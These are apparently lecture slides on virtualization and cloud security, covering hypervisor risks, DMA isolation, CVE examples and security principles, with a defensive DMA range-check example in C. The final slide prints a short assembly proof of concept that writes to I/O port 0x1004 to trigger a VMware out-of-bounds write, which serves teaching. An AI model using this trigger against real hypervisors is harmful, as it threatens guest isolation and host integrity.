Virtualization and Cloud Security - PowerPoint PPT Presentation

Slides: 17

Transcript and Presenter's Notes

Title: Virtualization and Cloud Security


1
Virtualization and Cloud Security
  • Huzur Saran
  • IIT Delhi

2
Typical Cloud
[Diagram: a Cloud API in front of several physical hosts; each host stacks hw, a hypervisor, and guest machines m1 to m5.]
3
Typical Server Virtualization Deployment
[Diagram: guest operating systems (Ubuntu, Win 2003, Win 2008, Redhat), each running several Apps, alongside a Management partition, on a Hypervisor running on Hardware.]
4
Typical VDI Deployment
[Diagram: Thin clients connect to desktops, each running on its own OS, alongside Dom0, on an Enterprise Hypervisor running on Hardware.]
5
Security Issues
  • The hypervisor is the underlying component of all
    these architectures. It is a new layer which
    needs to be protected.
  • Scale of deployments: Just the sheer scale of
    deployments makes this a security nightmare.
    Imagine 150 machines running a simultaneous
    scheduled AV scan on the same physical host.
    Chokes I/O and disk bandwidth.
  • Isolation: Machines of a company and its
    competitor could be running on the same physical
    machine. Insufficient isolation could lead to
    disaster.
  • New APIs to access virtualization/cloud
    services: Bugs in these could lead to compromise
    of the entire infrastructure.

6
Sample Hypervisor Security Issues
  • CVE-2007-4496, CVE-2007-4497: ESX3.01, guest
    operating system can cause buffer overflow and
    arbitrary code execution in the host
  • CVE-2007-0948: Virtual PC heap overflow which
    could cause arbitrary privilege escalation
  • CVE-2007-4993: Xen 3.0.3, user can escape to
    domain0 via grub.conf and pygrub

7
Security Issues: Why?
  • Hypervisors are written by humans. They have bugs,
    typically buffer overflows.
  • Hypervisors are complex: Xen is about 300K source
    lines of code.
  • Complete isolation is hard: Most systems don't
    have IOMMUs, so it is possible to DMA to
    arbitrary physical memory.
  • A compromised Domain0 on Xen pretty much means a
    hosed hypervisor. Domain0 runs commodity OSs
    which could have bugs.

8
Security Issues: Why?
  • DMA is a big problem on non-IOMMU-based systems
  • Xen can set up DMA
  • Dom0 can set up DMA
  • Driver domains can set up DMA
  • The range of physical addresses is not verified
  • IOMMU-based systems can restrict the range of
    addresses, but they are not present in commodity
    hardware
  • There are some techniques to even bypass IOMMU
    checks
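
Added example, not from the original slides: the range check that is missing when "the range of physical addresses is not verified", written as the mediation an IOMMU or hypervisor would apply to each DMA setup request. The `dma_window` type and all function names are hypothetical; the naive variant is included to show the integer-wrap case a simple comparison lets through.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical type: one window of physical memory a domain may DMA into. */
struct dma_window {
    uint64_t base;  /* first permitted physical address */
    uint64_t size;  /* window length in bytes */
};

/* True only if [addr, addr+len) lies wholly inside w. No sum is formed,
 * so a huge len cannot wrap past 2^64 and slip through. */
static bool range_in_window(const struct dma_window *w,
                            uint64_t addr, uint64_t len)
{
    if (len == 0 || addr < w->base)
        return false;
    uint64_t off = addr - w->base;  /* safe: addr >= base */
    return off < w->size && len <= w->size - off;
}

/* Mediation point for every DMA setup request; default is deny. */
bool dma_request_allowed(const struct dma_window *wins, size_t n,
                         uint64_t addr, uint64_t len)
{
    for (size_t i = 0; i < n; i++)
        if (range_in_window(&wins[i], addr, len))
            return true;
    return false;
}

/* Naive form for comparison: addr + len can wrap and pass the test. */
bool dma_request_allowed_naive(const struct dma_window *w,
                               uint64_t addr, uint64_t len)
{
    return addr >= w->base && addr + len <= w->base + w->size;
}

int main(void)
{
    /* Constructed sample: a single 64 KiB window at 1 MiB. */
    struct dma_window w = { 0x100000, 0x10000 };
    uint64_t wrap_len = UINT64_MAX - 0x100000 + 1;  /* addr + len wraps to 0 */
    printf("in range:      %d\n", dma_request_allowed(&w, 1, 0x100000, 0x1000));
    printf("wrap, checked: %d\n", dma_request_allowed(&w, 1, 0x100000, wrap_len));
    printf("wrap, naive:   %d\n", dma_request_allowed_naive(&w, 0x100000, wrap_len));
    return 0;
}
```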

9
Security Solutions
  • Trusted hypervisor
  • Hyperguard (Phoenix Technologies): A hypervisor
    integrity scanner in SMM.
  • Deepwatch (Intel project): Virtualization
    rootkit scanner
  • Domain 0 hardening: Various security solutions
    to white-list and harden Dom0

10
Security Opportunities
  • New breed of security products is now possible to
    protect guest OSs from being hijacked
  • Hypervisor based security suites cannot be
    detected by malware running in the guest
  • Hypervisors allow introspection of very early
    boot sequences of the guest, thereby making
    possible an entire new breed of BIOS rootkit and
    kernel rootkit scanners

11
Security Opportunities
  • APIs like VMsafe from VMware allow introspection
    of interesting system events in the guests
  • These events can then be processed on a dedicated
    security appliance
  • These events include CPU state monitoring, page
    faults, memory/register accesses, File-system
    events, network events etc.

12
Early Trends: Consolidate common security functions to security appliance
[Diagram, two panels. First panel: each guest OS carries its own AV and FW, on an Enterprise Hypervisor running on Hardware. Second panel: a Security Appliance Manager with Antivirus and Firewall sits beside the guest OSs, on an Enterprise Hypervisor with an AV Shim and FW Shim, running on Hardware.]
13
Security is hard at all levels
  • A prisoner was wrongly released after a fax was
    received from a grocery store stating that the
    Kentucky Supreme Court had demanded his release
    http://www.cnn.com/2007/US/04/21/wrongly.freed.ap/index.html

14
Security principles
  • Open design: you need all the help you can get
  • Economy of mechanism: fewer things to get right
  • Minimize secrets: secrets don't remain secret
  • Fail-safe defaults: most users won't change them
  • Least privilege: limit the damage of an accident
  • Separation of privilege: dangerous operations
    should require multiple principals
  • Complete mediation: check every operation

15
Sample Security Issues
  • http://taviso.decsystem.org/virtsec.pdf - Paper
    detailing several bugs in Virtual PC, Xen,
    VMware, Parallels and BOCHS.
  • http://www.theregister.co.uk/2009/10/09/amazon_cloud_bitbucket_ddos_aftermath/
    - UDP flood based DDoS against Amazon EC2
  • Argument handling bugs in FLASK (Xen)

16
  • Example: A specially crafted poke to I/O port
    0x1004 results in an out-of-bounds write to an
    attacker-controlled location. By interacting with
    the power management subsystem in specific ways,
    a write to an arbitrary location can be performed
    upon restarting a suspended virtual machine.
  • VMware PIIX4 ACPI PM OOB Write

        section .text
        global _start
    _start:
        mov eax, 110
        mov ebx, 3
        int 0x80        ; iopl()
        mov ax, 0x6c81
        mov dx, 0x1004
        out dx, ax      ; write to I/O port 0x1004
        xor ebx, ebx
        xor eax, eax
        inc eax
        int 0x80        ; exit